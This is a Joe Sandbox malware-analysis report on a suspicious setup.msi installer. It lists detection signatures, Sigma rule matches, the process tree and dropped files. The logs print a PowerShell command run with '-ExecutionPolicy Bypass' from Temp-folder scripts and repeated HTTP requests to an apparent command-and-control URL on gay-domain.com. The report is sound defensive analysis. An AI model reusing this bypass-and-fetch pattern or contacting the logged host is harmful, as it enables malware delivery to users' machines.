Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.msi

Overview

General Information

Sample name:setup.msi
Analysis ID:1455422
MD5:d06b110d3ce70b99849be9b67e0628e5
SHA1:5d4d89cd45ef98d53960a02187785827c6d80e7a
SHA256:1b1ab24f18299a51ac735702d501f92e627065666293ec5f31431e9b0997870b
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Bypasses PowerShell execution policy
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious MsiExec Embedding Parent
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 6668 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\setup.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 6768 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6948 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 76F054D823F7B346F706921024C133C7 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • powershell.exe (PID: 7060 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Script Interpreter Execution From Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 76F054D823F7B346F706921024C133C7, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6948, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7060, ProcessName: powershell.exe
Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 76F054D823F7B346F706921024C133C7, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6948, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7060, ProcessName: powershell.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 76F054D823F7B346F706921024C133C7, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6948, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7060, ProcessName: powershell.exe
Sigma detected: Suspicious MsiExec Embedding Parent
Source: Process startedAuthor: frack113: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 76F054D823F7B346F706921024C133C7, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6948, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7060, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 76F054D823F7B346F706921024C133C7, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6948, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7060, ProcessName: powershell.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 172.67.154.227:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: Binary string: CorSymReader.pdb source: Microsoft.DiaSymReader.Native.amd64.dll.1.dr
Source: Binary string: Microsoft.CSharp.ni.pdb source: Microsoft.CSharp.dll.1.dr
Source: Binary string: D:\a\audacity\audacity\.build.x64\RelWithDebInfo\lib-command-parameters.pdb source: lib-command-parameters.dll.1.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source: Binary string: `OTHER`TEMP`PACKED<%s return value>internal error: failed to write debug data to pdb streaminternal error: failed to add section contributioninternal warning: PDB Error string is "%S"internal error: failed to close debug infointernal error: failed to close PDBinternal error: failed to open PDB for writing in streaminternal error: failed to create debug info in PDBinternal error: failed to add code section to debug infointernal error: failed to add module to debug infointernal error: failed to create type info in PDBinternal error: failed to create inline type info in PDBinternal error: failed to create source file store in PDBinternal error: failed to close source file store in PDBinternal error: failed to close module in debug infointernal error: failed to commit type info in PDBinternal error: failed to commit inline type info in PDBinternal error: failed to add section header to debug infointernal error: failed to append section header to pdbinternal error: failed to close section header in debug infointernal error: failed to close debug info in PDBinternal error: failed to commit PDBinternal error: PDB data too largeinternal error: PDB stream truncatedinternal error: failed to close source file storeinternal error: failed to close type infointernal error: pdb append failedfxl_4_0too many arguments to target TXtoo many outputs to target TXclip not supported in texture shadersinvalid reference to input semantic '%s%d'invalid reference to output semantic '%s%d'0123456789abcdef.pdbVPosSV_ViewportArrayIndexColorFailed to log error, redirecting to debug output: source: D3DCompiler_47_cor3.dll.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdbk source: setup.msi
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\jit\clrjit.pdb source: clrjit.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
Source: Binary string: SymBinderBothSymReader.diaDia based SymReaderPdb based SymWriterCorSymWriter.pdbPdb based CorSymWriterCorSymReader.pdbPdb based CorSymReaderCorSymBinderNDP SymBinderCorSymWriterNDP SymWriterCorSymReaderNDP SymReader source: Microsoft.DiaSymReader.Native.amd64.dll.1.dr
Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\Microsoft.DiaSymReader.Native.amd64.pdb source: Microsoft.DiaSymReader.Native.amd64.dll.1.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: setup.msi
Source: Binary string: D3DCompiler_47.pdb source: D3DCompiler_47_cor3.dll.1.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: api-ms-win-core-console-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: api-ms-win-core-file-l1-1-0.dll.1.dr
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.CSharp\net6.0-windows-Release\Microsoft.CSharp.pdb source: Microsoft.CSharp.dll.1.dr
Source: Binary string: CorSymWriter.pdb source: Microsoft.DiaSymReader.Native.amd64.dll.1.dr
Source: Binary string: D3DCompiler_47.pdbGCTL source: D3DCompiler_47_cor3.dll.1.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: setup.msi, MSIC0B1.tmp.1.dr, MSIBF76.tmp.1.dr, MSIBD13.tmp.1.dr
Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\Microsoft.DiaSymReader.Native.amd64.pdbn source: Microsoft.DiaSymReader.Native.amd64.dll.1.dr
Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /userLicense.php?iugeh=9501&aigfj=sojgjf&sufv=67 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gay-domain.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /userLicense.php?iugeh=9501&aigfj=sojgjf&sufv=67 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gay-domain.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /userLicense.php?iugeh=9501&aigfj=sojgjf&sufv=67 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gay-domain.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /userLicense.php?iugeh=9501&aigfj=sojgjf&sufv=67 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gay-domain.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: gay-domain.com
Source: lib-command-parameters.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: lib-command-parameters.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: lib-command-parameters.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drString found in binary or memory: http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
Source: Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drString found in binary or memory: http://ccsca2021.ocsp-certum.com05
Source: Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: lib-command-parameters.dll.1.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: lib-command-parameters.dll.1.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: lib-command-parameters.dll.1.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: lib-command-parameters.dll.1.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: lib-command-parameters.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: lib-command-parameters.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: lib-command-parameters.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: lib-command-parameters.dll.1.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: lib-command-parameters.dll.1.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 00000003.00000002.1756900335.0000000005326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1756900335.0000000005877000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1756900335.000000000583F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1756900335.0000000005892000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gay-domain.com
Source: powershell.exe, 00000003.00000002.1756900335.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1756900335.000000000583F000.00000004.00000800.00020000.00000000.sdmp, setup.msiString found in binary or memory: http://gay-domain.com/userLicense.php?iugeh=9501&aigfj=sojgjf&sufv=67
Source: powershell.exe, 00000003.00000002.1759677985.0000000006239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: lib-command-parameters.dll.1.drString found in binary or memory: http://ocsp.comodoca.com0
Source: lib-command-parameters.dll.1.drString found in binary or memory: http://ocsp.digicert.com0A
Source: lib-command-parameters.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
Source: lib-command-parameters.dll.1.drString found in binary or memory: http://ocsp.digicert.com0X
Source: lib-command-parameters.dll.1.drString found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000003.00000002.1756900335.0000000005326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1760744523.0000000007830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drString found in binary or memory: http://repository.certum.pl/ccsca2021.cer0
Source: Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drString found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
Source: powershell.exe, 00000003.00000002.1756900335.00000000051D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drString found in binary or memory: http://subca.ocsp-certum.com01
Source: Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drString found in binary or memory: http://subca.ocsp-certum.com02
Source: Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drString found in binary or memory: http://subca.ocsp-certum.com05
Source: Qt5Gui.dll.1.drString found in binary or memory: http://www.aiim.org/pdfa/ns/id/
Source: powershell.exe, 00000003.00000002.1756900335.0000000005326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1760744523.0000000007830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drString found in binary or memory: http://www.certum.pl/CPS0
Source: Qt5Gui.dll.1.drString found in binary or memory: http://www.color.org)
Source: powershell.exe, 00000003.00000002.1756900335.00000000051D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.1759677985.0000000006239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1759677985.0000000006239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1759677985.0000000006239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1756900335.0000000005881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1756900335.000000000545F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gay-domain.com
Source: powershell.exe, 00000003.00000002.1756900335.0000000005881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1756900335.0000000005877000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1756900335.000000000545F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gay-domain.com/userLicense.php?iugeh=9501&aigfj=sojgjf&sufv=67
Source: powershell.exe, 00000003.00000002.1756900335.0000000005326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1760744523.0000000007830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: Microsoft.CSharp.dll.1.drString found in binary or memory: https://github.com/dotnet/runtime
Source: Microsoft.CSharp.dll.1.drString found in binary or memory: https://github.com/mono/linker/issues/1416.
Source: Microsoft.CSharp.dll.1.drString found in binary or memory: https://github.com/mono/linker/issues/1906.
Source: powershell.exe, 00000003.00000002.1756900335.00000000058C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1759677985.0000000006239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: lib-command-parameters.dll.1.drString found in binary or memory: https://sectigo.com/CPS0
Source: Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drString found in binary or memory: https://www.certum.pl/CPS0
Source: libssl-1_1.dll.1.drString found in binary or memory: https://www.openssl.org/H
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownHTTPS traffic detected: 172.67.154.227:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\49b9d7.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBD13.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBE8B.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBF76.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC052.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC0B1.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC100.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
